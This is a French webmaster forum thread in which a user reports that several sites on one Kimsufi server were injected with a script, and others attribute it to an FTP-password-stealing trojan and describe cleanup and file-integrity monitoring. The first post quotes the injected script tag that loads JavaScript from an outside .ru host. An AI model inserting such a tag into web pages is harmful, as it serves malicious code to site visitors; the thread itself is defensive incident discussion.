site hacké ou virus sur serveur kimsufi?
8 messages
• Page 1 sur 1
Consultez la formation à Google Analytics de WebRankInfo / Ranking Metrics
- bangdai
- WRInaute discret

- Messages: 206
- Inscription: 30 Nov 2007
site hacké ou virus sur serveur kimsufi?
bonjour,
j'ai plusieurs sites hébergés sur le meme serveur kimsufi gentoo et hier j'ai constaté qu'un des sites a été hacké.
Plus exactement, sur certaines pages, un script a été ajouté en fin de fichier afin d'exécuter un script externe.
Le code ressemble à ça:
Et je viens de me rendre compte qu'il ne s'agit pas que d'un seul site, mais plusieurs autres qui sont sur le meme serveur.
Je demande de l'aide, si qqn peut m'aider.
J'ai déja modifié les pages infectés et changer les chmod en 404 et 505 (dossier).
Je me demande si c'est juste un piratage ou est ce que mon serveur a un virus qui traine. Que faire?
Merci
j'ai plusieurs sites hébergés sur le meme serveur kimsufi gentoo et hier j'ai constaté qu'un des sites a été hacké.
Plus exactement, sur certaines pages, un script a été ajouté en fin de fichier afin d'exécuter un script externe.
Le code ressemble à ça:
<script type="text/javascript" src="http://obscurewax.ru/FAQ.js"></script>
<!--72628eb2e686638651ad69b6a34a630f-->
Et je viens de me rendre compte qu'il ne s'agit pas que d'un seul site, mais plusieurs autres qui sont sur le meme serveur.
Je demande de l'aide, si qqn peut m'aider.
J'ai déja modifié les pages infectés et changer les chmod en 404 et 505 (dossier).
Je me demande si c'est juste un piratage ou est ce que mon serveur a un virus qui traine. Que faire?
Merci
-

Zecat - WRInaute accro

- Messages: 12003
- Inscription: 1 Mar 2005
Re: site hacké ou virus sur serveur kimsufi?
Un classique trojan qui passe probablement par ton client ftp (filezila ?).
Une fois qu'il a chopé le smots de passe de tes accès ftp, il va infecter tous les sites. Donc :
1 - chnagement de tous les password
2 - Nettoyage des sites sur les serveurs (surveiller tous les fichier "index" et tous les fichier ".js")
Une fois qu'il a chopé le smots de passe de tes accès ftp, il va infecter tous les sites. Donc :
1 - chnagement de tous les password
2 - Nettoyage des sites sur les serveurs (surveiller tous les fichier "index" et tous les fichier ".js")
- bangdai
- WRInaute discret

- Messages: 206
- Inscription: 30 Nov 2007
Re: site hacké ou virus sur serveur kimsufi?
merci Zecat,
donc ce n'est pas un piratage. ça serait simplement un trojan qui a exploité filezila (et oui je suis bien sur filezila) et qui s'est amusé à modifier mes pages.
Meme si je nettoie les sites sur le serveurs, il faudrait nettoyer à la source. Donc éliminer mon trojan sur la machine.
Comment faire pour etre sur que je puisse utiliser filezila sans risque et sans qu'il aille faire des degats?
donc ce n'est pas un piratage. ça serait simplement un trojan qui a exploité filezila (et oui je suis bien sur filezila) et qui s'est amusé à modifier mes pages.
Meme si je nettoie les sites sur le serveurs, il faudrait nettoyer à la source. Donc éliminer mon trojan sur la machine.
Comment faire pour etre sur que je puisse utiliser filezila sans risque et sans qu'il aille faire des degats?
-

Zecat - WRInaute accro

- Messages: 12003
- Inscription: 1 Mar 2005
Re: site hacké ou virus sur serveur kimsufi?
J'ai été confronté à la bête et dans l'ordre j'ai fait :
1 - mise a jour anti virus sur ma machine et scan complet fin ...
2 - modification de tous mes pass ftp via l'admin de mes hebergeurs
3 - verif par securite que plus rien ne traine en local sur les pages de mes sites
4 - nettoyage un a un des sites par re upload des pages (maintenant que filezila est secure)
5 - Demande de reexamen des site spar google pour fiare disparaitre l'alerte
6 - En option je me suis mis en place une detection temps réel (cron une fois par minute) de l'arrivée à nouveau du trojan (on sait jamais) : ca detecte un changement de taille/date sur certains fichiers, ca les fous de coté, ce remet en temps réel des fichiers sains à la place, ca m'envoie un mail d'alerte sur 2 emails différents.
Pas la panacée mais au moins je dors plus tranquille et ca peut eviter un dérangement des visiteurs et qu'un bot tombe dessus (ca fait toujours désordre).
1 - mise a jour anti virus sur ma machine et scan complet fin ...
2 - modification de tous mes pass ftp via l'admin de mes hebergeurs
3 - verif par securite que plus rien ne traine en local sur les pages de mes sites
4 - nettoyage un a un des sites par re upload des pages (maintenant que filezila est secure)
5 - Demande de reexamen des site spar google pour fiare disparaitre l'alerte
6 - En option je me suis mis en place une detection temps réel (cron une fois par minute) de l'arrivée à nouveau du trojan (on sait jamais) : ca detecte un changement de taille/date sur certains fichiers, ca les fous de coté, ce remet en temps réel des fichiers sains à la place, ca m'envoie un mail d'alerte sur 2 emails différents.
Pas la panacée mais au moins je dors plus tranquille et ca peut eviter un dérangement des visiteurs et qu'un bot tombe dessus (ca fait toujours désordre).
- bangdai
- WRInaute discret

- Messages: 206
- Inscription: 30 Nov 2007
Re: site hacké ou virus sur serveur kimsufi?
ok, bien saisi,
en resumé, nettoyer le trojan sur la machine, changer les pass FTP et nettoyer le serveur.
concerant le script que tu as crée, cest possible de me le passer? Enfin, je ferai les modif qu'il faut pour l'adapter a mon cas.
Je trouve que c'est une bonne methode pour garder le site sain, et ça evite detre hacké.
Enfait, comment tu fais pour remettre les fichiers sains a la place, si l'ancien ficher est deja corrompu?
encore merci
en resumé, nettoyer le trojan sur la machine, changer les pass FTP et nettoyer le serveur.
concerant le script que tu as crée, cest possible de me le passer? Enfin, je ferai les modif qu'il faut pour l'adapter a mon cas.
Je trouve que c'est une bonne methode pour garder le site sain, et ça evite detre hacké.
Enfait, comment tu fais pour remettre les fichiers sains a la place, si l'ancien ficher est deja corrompu?
encore merci
-

ricosound - WRInaute impliqué

- Messages: 566
- Inscription: 25 Oct 2009
Re: site hacké ou virus sur serveur kimsufi?
bangdai a écrit:En fait, comment tu fais pour remettre les fichiers sains a la place, si l'ancien ficher est deja corrompu?
Facile, tu gardes une copie de sécurité dans un autre répertoire et sous un autre nom.
Et à chaque fois que tu en as besoin tu recopies au bon endroit en renommant les fichiers correctement.
Ça fonctionne aussi à la main si tu as gardé une copie du site, mais la méthode du grrrominet est bien plus rapide et efficace.
Cordialement, Éric.
-

Zecat - WRInaute accro

- Messages: 12003
- Inscription: 1 Mar 2005
Re: site hacké ou virus sur serveur kimsufi?
ricosound a écrit:bangdai a écrit:En fait, comment tu fais pour remettre les fichiers sains a la place, si l'ancien ficher est deja corrompu?
Facile, tu gardes une copie de sécurité dans un autre répertoire et sous un autre nom.
Et à chaque fois que tu en as besoin tu recopies au bon endroit en renommant les fichiers correctement.
Ça fonctionne aussi à la main si tu as gardé une copie du site, mais la méthode du grrrominet est bien plus rapide et efficace.![]()
Cordialement, Éric.
Toutafé toutafé ... et surtout reposante !
non sans avoir prealablement mis de coté les fichiers verolés pour analyse ultérieure (perso je les reecris simplement avec un timestamp dans le nom, comme ca meme si le trojan insiste, je garde tout). Bon pour le script je prefère pas because y a des trucs "en plus" pour tromper "l'ennemi" que je souhaite garder pour mezigue. Mais bon tu as tout le mode d'emploi, c'ets pas bien dur à coder.
8 messages
• Page 1 sur 1
Formation recommandée sur ce thème :
Formation Google Analytics : en 2 jours, apprenez comment exploiter l'essentiel des possibilités de l'outil de mesure d'audience de Google. Formation animée par les experts Google Analytics de Ranking Metrics.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Lectures recommandées sur ce thème :
- Migration serveur Kimsufi vers autre Kimsufi ou mutualisé?
- Suis je en train d'être hacké par le virus Santy.A ???
- Serveur hacké?
- Serveur Hacké ?
- Processeur : Serveur Dedibox PRO V2 ou Kimsufi 4T ?
- argh... notre serveur hacké ?
- Serveur OVH hacké... De gros doutes
- Requête SQL beaucoup plus lente malgré un serveur kimsufi 250g plus puissant
- Comment eviter un blacklistage sur mon serveur kimsufi 250 plesk 9.5
- Mon site n'envoie aucun mail : herbergement sur un serveur kimsufi
- La valse des rachats de sociétés par Google en mai/juin 2007 - 06-06-2007
- Google Pack s'enrichit de 2 nouveaux logiciels gratuits - 28-03-2007
- Comment créer une page web en PHP - 04-08-2008
- Comparer les classes C de 2 adresses IP - 03-09-2004
- Mise à jour des services Postini - 11-02-2009
- Tous les outils à connaître pour analyser un site - 16-09-2004
- Redirection (PHP, JavaScript, serveur...) - 04-07-2003
- Changements de nom de domaine et TrustRank - 18-10-2005
- Analyser la classe C de l'adresse IP
Cet outil vous permet de vérifier si plusieurs sites sont hébergés sur la même classe C (adresse IP du serveur). - Test HTTP header
Cet outil vous permet de connaître le code HTTP renvoyé par le serveur pour une page donnée.
Qui est en ligne
Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités
